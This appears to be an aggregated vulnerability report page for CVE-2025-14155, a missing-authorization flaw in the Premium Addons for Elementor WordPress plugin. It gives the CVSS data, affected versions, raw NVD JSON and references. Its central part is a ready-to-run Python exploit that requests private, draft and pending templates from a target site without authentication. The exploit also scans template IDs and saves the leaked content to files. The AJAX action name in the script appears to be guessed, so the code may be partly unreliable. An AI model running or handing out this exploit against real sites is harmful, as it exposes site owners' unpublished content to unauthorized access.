Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-14155 CVSS 5.3 MEDIUM

CVE-2025-14155

Published: 2025-12-23 10:15:43
Last Modified: 2026-04-08 17:20:25
Source: [email protected]

Description

The Premium Addons for Elementor – Powerful Elementor Templates & Widgets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_template_content' function in all versions up to, and including, 4.11.53. This makes it possible for unauthenticated attackers to view the content of private, draft, and pending templates.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:* - VULNERABLE
Premium Addons for Elementor < 4.11.54
Premium Addons for Elementor <= 4.11.53

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-14155 PoC - Unauthorized Template Content Access # Target: Premium Addons for Elementor plugin (<= 4.11.53) def exploit_cve_2025_14155(target_url, template_id=1): """ Exploit for CVE-2025-14155: Missing authorization in get_template_content function Allows unauthenticated attackers to view private/draft/pending templates Args: target_url: Base URL of the WordPress site template_id: ID of the template to retrieve (default: 1) Returns: Template content if vulnerable, None otherwise """ # Method 1: AJAX endpoint (common for WordPress plugins) ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Try the get_template_content action data = { 'action': 'pa_get_template_content', 'id': template_id } try: response = requests.post(ajax_url, data=data, timeout=10) if response.status_code == 200: # Check if we got template content if 'content' in response.text or len(response.text) > 100: print(f"[+] VULNERABLE! Template ID {template_id} content:") print(response.text) return response.text else: print(f"[-] Template ID {template_id} returned empty or not accessible") return None except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None return None def scan_templates(target_url, start_id=1, end_id=100): """ Scan for accessible templates by iterating through IDs """ print(f"[*] Scanning templates on {target_url}...") for template_id in range(start_id, end_id + 1): content = exploit_cve_2025_14155(target_url, template_id) if content: print(f"[+] Found accessible template: ID {template_id}") # Save to file for analysis with open(f"template_{template_id}_leak.txt", 'w') as f: f.write(content) print(f"[+] Saved to template_{template_id}_leak.txt") # Example usage if __name__ == "__main__": target = "http://target-wordpress-site.com" exploit_cve_2025_14155(target, 1) # scan_templates(target, 1, 50) # Uncomment to scan multiple IDs

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14155", "sourceIdentifier": "[email protected]", "published": "2025-12-23T10:15:43.297", "lastModified": "2026-04-08T17:20:24.867", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Premium Addons for Elementor – Powerful Elementor Templates & Widgets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_template_content' function in all versions up to, and including, 4.11.53. This makes it possible for unauthenticated attackers to view the content of private, draft, and pending templates."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "4.11.54", "matchCriteriaId": "64CFC13B-0B7D-4AAA-946C-74E74ED44158"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/addons-integration.php#L1624", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/addons-integration.php#L90", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3416254/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://research.cleantalk.org/cve-2025-14155/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/135c33bb-5ec2-4697-9340-1d2651ff3a0b?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.